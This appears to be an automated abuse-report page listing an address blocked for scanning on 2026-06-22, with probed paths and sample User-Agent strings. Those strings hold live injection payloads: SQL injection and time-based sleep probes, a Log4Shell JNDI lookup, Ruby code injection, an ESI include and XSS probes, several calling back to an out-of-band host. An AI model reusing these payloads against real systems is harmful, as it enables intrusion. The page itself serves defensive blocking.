abuseip.org
- Reason: suspicious paths across 1 domains
- Hits (last hour): 91
- Unique targets hit: 1
- Unique paths probed: 669
- Detection count: 12
- First seen: 2026-06-22 13:06:13 UTC
- Last seen: 2026-06-22 13:09:25 UTC
- Block expires: 2026-06-23 14:04:15 UTC
Sample paths probed
- /nuyqcjogkdw8.html
- /v1/swagger.json
- /swagger/v1/swagger.json
- /nuyqcjogkdw8.jsp
- /v1/swagger.yaml
- /efWb5YMLJjWzVxlf
- /nuyqcjogkdw8
- /swagger.json
- /api/v1.0/swagger.yaml
- /nuyqcjogkdw8.php
- /api/v1/swagger.json
- /?vDSS={KsNb}&uFPK=<>
- /api/v2/swagger.json
- /swagger/docs/v2
- /
- /swagger-json
- /srzGMMhG
- /api/swagger.yaml
- /MrRrPlek
- /?id=JJJ0QQQ&action=JJJ1QQQ&page=JJJ2QQQ&name=JJJ3QQQ&f=JJJ4QQQ&url=JJJ5QQQ&email=JJJ6QQQ&type=JJJ7QQQ&file=JJJ8QQQ&title=JJJ9QQQ&code=JJJ10QQQ&q=JJJ11QQQ&user=JJJ12QQQ&token=JJJ13QQQ&t=JJJ14QQQ&c=JJJ15QQQ&data=JJJ16QQQ&mode=JJJ17QQQ&order=JJJ18QQQ&lang=JJJ19QQQ&p=JJJ20QQQ&key=JJJ21QQQ&status=JJJ22QQQ&start=JJJ23QQQ&charset=JJJ24QQQ&s=JJJ25QQQ&post=JJJ26QQQ&login=JJJ27QQQ&search=JJJ28QQQ&content=JJJ29QQQ&comment=JJJ30QQQ&step=JJJ31QQQ&ajax=JJJ32QQQ&debug=JJJ33QQQ&state=JJJ34QQQ&query=JJJ35QQQ&error=JJJ36QQQ&save=JJJ37QQQ&sort=JJJ38QQQ&format=JJJ39QQQ&tab=JJJ40QQQ&offset=JJJ41QQQ&edit=JJJ42QQQ&preview=JJJ43QQQ&filter=JJJ44QQQ&from=JJJ45QQQ&view=JJJ46QQQ&a=JJJ47QQQ&limit=JJJ48QQQ&do=JJJ49QQQ&plugin=JJJ50QQQ&theme=JJJ51QQQ&text=JJJ52QQQ&test=JJJ53QQQ&path=JJJ54QQQ&pass=JJJ55QQQ&dir=JJJ56QQQ&show=JJJ57QQQ&h=JJJ58QQQ&value=JJJ59QQQ&filename=JJJ60QQQ&redirect=JJJ61QQQ&year=JJJ62QQQ&group=JJJ63QQQ&template=JJJ64QQQ&subject=JJJ65QQQ&m=JJJ66QQQ&u=JJJ67QQQ&dest=JJJ68QQQ&uri=JJJ69QQQ&continue=JJJ70QQQ&window=JJJ71QQQ&next=JJJ72QQQ&reference=JJJ73QQQ&site=JJJ74QQQ&<e5T=JJJ75QQQ&
Sample User-Agents
- 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡
- blid.site/t/xss.html?%00
- 'A'.concat(70-3).concat(22*4).concat(112).concat(85).concat(97).concat(80)+(require'socket' Socket.gethostbyname('hitum'+'ynylcgvtbb4c4.blid.site.')[3].to_s)
- 1DDDPNYX0
- -1 OR 5*5=25
- ${j${::-n}di:dns${::-:}//hit244432278441bbb${::-.}blid.site}
- HttP://blid.site/t/xss.html?%00
- "+"A".concat(70-3).concat(22*4).concat(117).concat(80).concat(115).concat(84)+(require"socket" Socket.gethostbyname("hitcu"+"qzbmfkxh31e03.blid.site.")[3].to_s)+"
- '+'A'.concat(70-3).concat(22*4).concat(99).concat(85).concat(109).concat(73)+(require'socket' Socket.gethostbyname('hitma'+'amxrmbie9ec0b.blid.site.')[3].to_s)+'
- -1' OR 5*5=25 --
- if(now()=sysdate(),sleep(15),0)
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36<esi:include src="http://blid.site/rpb.png"/>
- http://hitqsdhjzonab.blid.site/
- Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4201.0 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)
- Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/141.0.0.0 Safari/537.36
- -1' OR 5*5=25 or 'kjKQO8j9'='
- -1 OR 5*5=25 --
- hitqsdhjzonab.blid.site
- -1" OR 5*5=25 or "pWWZ7e5c"="
- -1" OR 5*5=25 --
What does this mean?
This address sent traffic that the redirs.com edge classified as automated abuse — typically WordPress/PHP exploit scanning, credential file probing (.env, .git, .aws/), or mass-domain enumeration. The block is automatic and time-limited (24 hours from last detection).
If you believe this is a false positive, contact [email protected] with the IP and the timestamps above.